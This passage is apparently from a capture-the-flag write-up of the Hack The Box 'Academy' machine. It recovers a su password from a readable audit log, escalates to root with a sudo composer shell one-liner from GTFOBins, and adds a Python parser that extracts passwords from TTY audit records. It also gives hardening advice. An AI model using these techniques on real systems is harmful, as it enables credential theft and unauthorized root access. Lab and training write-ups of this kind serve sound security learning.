-rw-r-----   1 syslog    adm             356137 Oct 21 09:46 syslog.6.gz
-rw-r-----   1 syslog    adm             230354 Sep 14  2020 syslog.7.gz
-rw-------   1 root      root                 0 Apr 23  2020 ubuntu-advantage.log
drwxr-x---   2 root      adm               4096 Feb  9 14:19 unattended-upgrades
-rw-------   1 root      root               697 Feb  9 14:19 vmware-network.1.log
-rw-------   1 root      root               697 Nov  9 10:11 vmware-network.2.log
-rw-------   1 root      root               697 Nov  6 09:52 vmware-network.3.log
-rw-------   1 root      root               717 Nov  5 14:19 vmware-network.4.log
-rw-------   1 root      root               697 Nov  5 14:17 vmware-network.5.log
-rw-------   1 root      root               697 Nov  5 11:37 vmware-network.6.log
-rw-------   1 root      root               697 Oct 21 10:53 vmware-network.7.log
-rw-------   1 root      root               717 Oct 21 09:48 vmware-network.8.log
-rw-------   1 root      root               697 Oct 21 09:46 vmware-network.9.log
-rw-------   1 root      root               697 Apr 18 14:50 vmware-network.log
-rw-------   1 root      root              1875 Feb  9 14:25 vmware-vmsvc-root.1.log
-rw-------   1 root      root              1875 Nov  9 10:14 vmware-vmsvc-root.2.log
-rw-------   1 root      root              1875 Nov  6 09:55 vmware-vmsvc-root.3.log
-rw-------   1 root      root              4710 Apr 18 14:50 vmware-vmsvc-root.log
-rw-------   1 root      root              6418 Apr 18 14:50 vmware-vmtoolsd-root.log
-rw-rw-r--   1 root      utmp             88320 Apr 18 15:07 wtmp

There are many logs, but one directory stands out: audit, which is readable by the adm group (drwxr-x--- root adm), so cry0l1t3 can read the audit trail.
More information can be obtained here:
https://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html

With aureport we can get a report of the TTY keystrokes the audit subsystem recorded:

cry0l1t3@academy:/var/log/audit$ aureport --tty

TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
6. 08/12/2020 02:30:43 94 0 ? 1 nano <delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
7. 08/12/2020 02:32:13 95 0 ? 1 nano <down>,<up>,<up>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<backspace>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
8. 08/12/2020 02:32:55 96 0 ? 1 nano "6",<^X>,"y",<ret>
9. 08/12/2020 02:33:26 97 0 ? 1 bash "ca",<up>,<up>,<up>,<backspace>,<backspace>,"cat au",<tab>,"| grep data=",<ret>,"cat au",<tab>,"| cut -f11 -d\" \"",<ret>,<up>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<right>,<right>,"grep data= | ",<ret>,<up>," > /tmp/data.txt",<ret>,"id",<ret>,"cd /tmp",<ret>,"ls",<ret>,"nano d",<tab>,<ret>,"cat d",<tab>," | xx",<tab>,"-r -p",<ret>,"ma",<backspace>,<backspace>,<backspace>,"nano d",<tab>,<ret>,"cat dat",<tab>," | xxd -r p",<ret>,<up>,<left>,"-",<ret>,"cat /var/log/au",<tab>,"t",<tab>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,"d",<tab>,"aud",<tab>,"| grep data=",<ret>,<up>,<up>,<up>,<up>,<up>,<down>,<ret>,<up>,<up>,<up>,<ret>,<up>,<up>,<up>,<ret>,"exit",<backspace>,<backspace>,<backspace>,<backspace>,"history",<ret>,"exit",<ret>
10. 08/12/2020 02:33:26 98 0 ? 1 sh "exit",<nl>
11. 08/12/2020 02:33:30 107 0 ? 1 sh "/bin/bash -i",<nl>
12. 08/12/2020 02:33:36 108 0 ? 1 bash "istory",<ret>,"history",<ret>,"exit",<ret>
13. 08/12/2020 02:33:36 109 0 ? 1 sh "exit",<nl>
cry0l1t3@academy:/var/log/audit$ 

Events 1 and 2 show a session (audit uid 0) running su and then typing mrb3n's password at su's prompt, captured keystroke by keystroke:

$ su mrb3n
mrb3n_Ac@d3my! (typed at the password prompt)
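What aureport --tty is reading, as an added example (not code from the original writeup): TTY audit records (type=TTY) carry the typed bytes hex-encoded in their data= field, and when pam_tty_audit is enabled with the log_passwd option the bytes typed at a password prompt are recorded as well. The log lines in the block are constructed to match that record layout and carry the keystrokes the report above recovered; they are not copied from the box. The same parser run over a real /var/log/audit/audit.log is a quick check for credentials sitting in the audit trail.

```python
"""Added example, not code from the original writeup.

Decodes type=TTY audit records and pairs each 'su <user>' typed in a shell with
the keystrokes su itself received next, which is the password when log_passwd
is on.  SAMPLE_AUDIT_LOG is constructed, shaped like auditd's own records.
"""
import re

TTY_RECORD = re.compile(
    r'type=TTY msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): .*?'
    r'auid=(?P<auid>\d+) .*?comm="(?P<comm>[^"]+)" data=(?P<data>[0-9A-Fa-f]+)'
)

# Constructed sample (not from the box); data= is the hex of the typed bytes.
SAMPLE_AUDIT_LOG = """\
type=USER_START msg=audit(1597199290.101:82): pid=2510 uid=0 auid=0 ses=1 msg='op=PAM:session_open acct="root" exe="/bin/login" res=success'
type=TTY msg=audit(1597199290.612:83): tty pid=2511 uid=0 auid=0 ses=1 major=136 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=0 auid=0 ses=1 major=136 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199304.331:89): tty pid=2521 uid=1001 auid=0 ses=1 major=136 minor=1 comm="sh" data=77686F616D690A
"""


def parse_tty_records(log_text):
    """Return the TTY records in a log as dicts, with the keystrokes decoded into 'text'."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RECORD.search(line)
        if not m:
            continue
        rec = m.groupdict()
        # latin-1 keeps control bytes (^C, backspace, ...) decodable instead of raising
        rec["text"] = bytes.fromhex(rec["data"]).decode("latin-1")
        records.append(rec)
    return records


def find_su_passwords(records):
    """Pair every 'su [options] [user]' typed in a shell with su's next keystroke record.

    The first later record with comm="su" is what was typed at the password prompt.
    Returns a list of (target_user, typed_password).
    """
    shells = ("sh", "bash", "dash", "zsh")
    found = []
    for i, rec in enumerate(records):
        cmd = rec["text"].strip()
        if rec["comm"] not in shells:
            continue
        if cmd != "su" and not cmd.startswith("su "):
            continue
        args = [a for a in cmd.split()[1:] if not a.startswith("-")]
        target = args[0] if args else "root"
        for later in records[i + 1:]:
            if later["comm"] == "su":
                found.append((target, later["text"].rstrip("\r\n")))
                break
    return found


if __name__ == "__main__":
    recs = parse_tty_records(SAMPLE_AUDIT_LOG)
    for r in recs:
        print(r["serial"], r["comm"], repr(r["text"]))
    print("credentials in the audit trail:", find_su_passwords(recs))
```

Two things to take away for hardening: pam_tty_audit's log_passwd option turns the audit log into a credential store and should stay off unless there is a strong reason for it, and when TTY auditing is on at all, /var/log/audit must not be readable by a broad group such as adm, which is exactly the combination that hands us the next user here.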

Let’s do the same:

cry0l1t3@academy:/var/log/audit$ su mrb3n

Password:

$ bash
mrb3n@academy:/var/log/audit$ whoami

mrb3n

mrb3n@academy:/var/log/audit$ id

uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)

And even more enumeration as user mrb3n:

mrb3n@academy:~$ ls -la

total 32
drwxr-xr-x 5 mrb3n mrb3n 4096 Aug 12  2020 .
drwxr-xr-x 8 root  root  4096 Aug 10  2020 ..
lrwxrwxrwx 1 root  root     9 Aug 10  2020 .bash_history -> /dev/null
-rw-r--r-- 1 mrb3n mrb3n  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 mrb3n mrb3n 3771 Feb 25  2020 .bashrc
drwxrwxr-x 3 mrb3n mrb3n 4096 Oct 21 10:55 .cache
drwxrwxr-x 3 mrb3n mrb3n 4096 Aug 12  2020 .config
drwxrwxr-x 3 mrb3n mrb3n 4096 Aug 12  2020 .local
-rw-r--r-- 1 mrb3n mrb3n  807 Feb 25  2020 .profile
mrb3n@academy:~$ sudo -l 
[sudo] password for mrb3n: 
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

User mrb3n can run composer as root through sudo.

Checking GTFOBins, we can see whether this binary can be used to escalate privileges:

https://gtfobins.github.io/gtfobins/composer/

"If the binary is allowed to run as a superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access."

Composer executes the commands defined under "scripts" in composer.json through a shell, so a composer.json we control means arbitrary commands as root. The GTFOBins one-liner:

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

mrb3n@academy:~$ nano shell.sh        # paste the three lines above
mrb3n@academy:~$ chmod +x shell.sh
mrb3n@academy:~$ ./shell.sh

PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# bash
root@academy:/tmp/tmp.JEDMys351B# cd 
root@academy:~# whoami
root
root@academy:~# ls
academy.txt  root.txt  snap
root@academy:~# cat academy.txt 
We've been hard at work.
Check out our brand new training platform, Hack the Box Academy!

https://academy.hackthebox.eu/

Register an account and browse our initial list of courses!

   _.-'`'-._
   .-'    _    '-.
    `-.__  `\_.-'
      |  `-``\|
      `-.....-H
              T
              B

root@academy:~# cat root.txt

d551XXXXXXXXXXXXXXXXXXXXXXXXXXXX
